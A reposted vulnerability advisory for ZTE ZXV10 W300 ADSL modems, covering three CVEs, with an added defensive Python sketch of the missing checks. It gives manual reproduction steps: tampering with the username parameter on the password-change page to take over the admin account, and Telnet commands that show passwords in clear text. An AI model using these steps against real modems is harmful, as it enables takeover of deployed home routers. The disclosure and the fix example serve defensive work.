0day.today - Biggest Exploit Database in the World.
ZTE ADSL ZXV10 W300 Modems - Multiple Vulnerabilities
# Exploit Title: [ZTE ADSL ZXV10 W300 modems - Multiple vulnerabilities]
# Discovered by: Karn Ganeshen
# Vendor Homepage: [www.zte.com.cn]
# Versions Reported: [W300V2.1.0f_ER7_PE_O57 and W300V2.1.0h_ER7_PE_O57]

*CVE-ID*:
CVE-2015-7257
CVE-2015-7258
CVE-2015-7259

*Note*: Large deployment size, primarily in Peru, used by TdP.

1 *Insufficient authorization controls*
*CVE-ID*: CVE-2015-7257

Observed in the Password Change functionality. Other functions may be vulnerable as well.

*Expected behavior:*
Only the administrative 'admin' user should be able to change the password for all device users. 'support' is a diagnostic user with restricted privileges. It can change only its own password.

*Vulnerability:*
Any non-admin user can change the 'admin' password.

*Steps to reproduce:*
a. Login as user 'support' password XXX
b. Access Password Change page - http://<IP>/password.htm
c. Submit request
d. Intercept and tamper the parameter username: change from 'support' to 'admin'
e. Enter the new password > old password is not requested > Submit > Login as admin -> Pwn!

2 *Sensitive information disclosure - clear-text passwords*
*CVE-ID*: CVE-2015-7258

Displaying user information over a Telnet connection shows all valid users and their passwords in clear-text.

*Steps to reproduce:*

    $ telnet <IP>
    Trying <IP>...
    Connected to <IP>.
    Escape character is '^]'.
    User Access Verification
    Username: admin
    Password: < admin/XXX1
    $sh
    ADSL#login show     <-- shows user information
    Username    Password     Priority
    admin       password1    2
    support     password2    0
    admin       password3    1

3 *(Potential) Backdoor account feature - insecure account management*
*CVE-ID*: CVE-2015-7259

The same login account can exist on the device multiple times, each with a different priority#. It is possible to log in to the device with either of the username/password combinations. It is considered a (redundant) login support *feature*.

*Steps to reproduce:*

    $ telnet <IP>
    Trying <IP>...
    Connected to <IP>.
    Escape character is '^]'.
    User Access Verification
    User Access Verification
    Username: admin
    Password: <-- admin/password3
    $sh
    ADSL#login show
    Username    Password     Priority
    admin       password1    2
    support     password2    0
    admin       password3    1

+++++
--
Best Regards,
Karn Ganeshen

# 0day.today [2024-09-17] #
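
Added example, not part of the original advisory and not ZTE firmware code: a sketch of the server-side checks whose absence the three issues above describe (authorizing the password-change target against the session, storing only salted hashes, and rejecting duplicate usernames). The AccountStore class, its method names and all passwords are hypothetical and constructed for illustration.

```python
import hashlib, hmac, os

class AccountStore:
    """Hypothetical store; all names here are illustrative, not ZTE firmware code."""
    def __init__(self):
        self._users = {}  # username -> (salt, digest, priority): one entry per name

    @staticmethod
    def _digest(password, salt):
        return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 200_000)

    def _set(self, username, password, priority):
        salt = os.urandom(16)
        self._users[username] = (salt, self._digest(password, salt), priority)

    def add_user(self, username, password, priority):
        # CVE-2015-7259 class: refuse a second account under an existing name.
        if username in self._users:
            raise ValueError("duplicate username")
        self._set(username, password, priority)

    def verify(self, username, password):
        rec = self._users.get(username)
        return rec is not None and hmac.compare_digest(rec[1], self._digest(password, rec[0]))

    def show(self):
        # CVE-2015-7258 class: a listing returns names and priorities, never secrets.
        return [(u, rec[2]) for u, rec in sorted(self._users.items())]

    def change_password(self, session_user, target_user, current_pw, new_pw):
        # CVE-2015-7257 class: target_user is request data; check it against the session.
        if target_user not in self._users:
            raise KeyError("unknown user")
        if session_user != target_user and session_user != "admin":
            raise PermissionError("only admin may change another user's password")
        # The caller must re-enter their own current password.
        if not self.verify(session_user, current_pw):
            raise PermissionError("current password incorrect")
        self._set(target_user, new_pw, self._users[target_user][2])

def demo():
    store = AccountStore()  # constructed accounts mirroring the advisory's two roles
    store.add_user("admin", "constructed-admin-pw", 2)
    store.add_user("support", "constructed-support-pw", 0)
    try:  # 'support' submits username=admin, as in the advisory's step d
        store.change_password("support", "admin", "constructed-support-pw", "new-pw")
    except PermissionError:
        return store.verify("admin", "constructed-admin-pw")  # admin password unchanged
    return False
```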